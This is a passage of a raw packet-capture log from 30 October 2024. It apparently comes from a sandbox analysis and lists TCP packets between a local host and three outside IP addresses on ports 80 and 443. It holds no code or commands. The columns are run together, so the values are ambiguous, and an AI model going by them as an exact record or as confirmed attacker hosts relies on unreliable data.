                                                                                                          Oct 30, 2024 08:19:42.069772959 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069777966 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.069796085 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.069808960 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.069925070 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069964886 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.070080996 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070091963 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070102930 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070112944 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070120096 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.070130110 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070130110 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.070139885 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070146084 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.070149899 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070162058 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070163965 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.070173025 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070178032 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.070189953 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.070190907 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070200920 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070205927 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.070218086 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.070218086 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070229053 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070231915 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.070242882 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.070256948 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.070278883 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070290089 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070301056 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070312023 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070322037 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.070336103 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.070343971 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.070343971 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.070436001 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070446014 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070456028 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070471048 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070475101 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.070480108 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070483923 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.070496082 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070503950 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.070512056 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.070528030 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.070712090 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070722103 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070733070 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070749998 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.070764065 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.070796013 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070808887 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070822001 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070831060 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.070838928 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070842981 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.070867062 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.070950031 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070960045 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.070991993 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.071031094 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.071042061 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.071053028 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.071070910 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.071085930 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.071358919 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.071397066 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.071400881 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.071407080 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.071422100 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.071423054 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.071434975 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.071454048 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.071481943 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.071492910 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.071502924 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.071515083 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.071521044 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.071526051 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.071531057 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.071542978 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.071557045 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.071557999 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.071568966 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.071587086 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.071600914 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.071659088 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.071669102 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.071680069 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.071691036 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.071696043 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.071702957 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.071715117 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.071716070 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.071729898 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.071747065 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.071772099 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.071783066 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.071794987 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.071810007 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.071819067 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.071831942 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.072351933 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.072371960 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.072390079 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.072401047 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.072402954 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.072411060 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.072426081 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.072441101 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.072478056 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.072488070 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.072499990 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.072516918 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.072530031 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.072607994 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.072619915 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.072629929 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.072643042 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.072647095 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.072657108 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.072659969 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.072670937 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.072674990 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.072681904 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.072686911 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.072693110 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.072699070 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.072704077 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.072710991 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.072722912 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.072736979 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.072736979 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.072767973 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.072829962 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.181382895 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.181396961 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.181406975 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.181509972 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.181519985 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.181530952 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.181551933 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.181561947 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.181574106 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.181582928 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.181582928 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.181605101 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.181605101 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.181700945 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.181713104 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.181725025 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.181739092 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.181749105 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.181755066 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.181765079 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.181778908 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.181780100 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.181813002 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.181823015 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.181827068 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.181830883 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.181854963 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.181868076 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.181899071 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.181909084 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.181920052 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.181932926 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.181935072 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.181947947 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.181965113 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.181968927 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.181978941 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.181994915 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.182010889 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.182326078 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.182365894 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.182375908 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.182387114 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.182410002 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.182418108 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.182459116 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.182468891 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.182497025 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.182619095 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.182629108 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.182660103 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.182699919 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.182738066 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183104992 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183145046 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183162928 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183172941 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183197975 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183258057 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183268070 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183284044 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183295012 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183299065 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183306932 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183319092 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183335066 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183350086 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183355093 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183361053 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183378935 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183393955 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183473110 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183482885 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183494091 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183511019 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183511019 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183521986 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183527946 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183531046 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183546066 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183562994 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183634043 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183644056 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183655024 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183674097 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183685064 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183743000 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183753014 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183780909 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183938026 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183948040 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183959007 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183979034 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183991909 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184029102 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184040070 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184051037 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184061050 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184062958 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184081078 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184082031 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184093952 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184094906 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184104919 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184109926 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184124947 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184138060 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184158087 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184169054 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184179068 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184189081 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184194088 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184199095 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184207916 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184222937 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184233904 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184279919 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184289932 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184300900 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184312105 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184315920 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184330940 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184345007 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184453964 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184464931 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184480906 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184490919 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184499025 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184499979 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184513092 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184514999 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184530020 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184531927 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184540987 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184545040 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184551954 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184557915 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184570074 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184585094 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184604883 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184614897 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184624910 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184632063 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184643984 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184659004 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184760094 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184771061 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184802055 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184861898 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184873104 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184900999 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.185086012 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.185096979 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.185107946 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.185123920 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.185137987 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.372137070 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:46.450398922 CET4916280192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:46.456175089 CET8049162132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:46.456253052 CET4916280192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:46.457041025 CET4916280192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:46.462486029 CET8049162132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:47.347378969 CET8049162132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:47.370827913 CET4916280192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:47.376267910 CET8049162132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:47.654726028 CET8049162132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:47.874475002 CET8049162132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:47.874536991 CET4916280192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:48.687002897 CET49163443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:48.687036037 CET44349163188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:48.687082052 CET49163443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:48.694617987 CET49163443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:48.694628954 CET44349163188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:49.347184896 CET44349163188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:49.347244978 CET49163443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:49.357356071 CET49163443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:49.357382059 CET44349163188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:49.357888937 CET44349163188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:49.451366901 CET49163443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:49.495331049 CET44349163188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:49.594788074 CET44349163188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:49.594875097 CET44349163188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:49.594990015 CET49163443192.168.2.22188.114.96.3
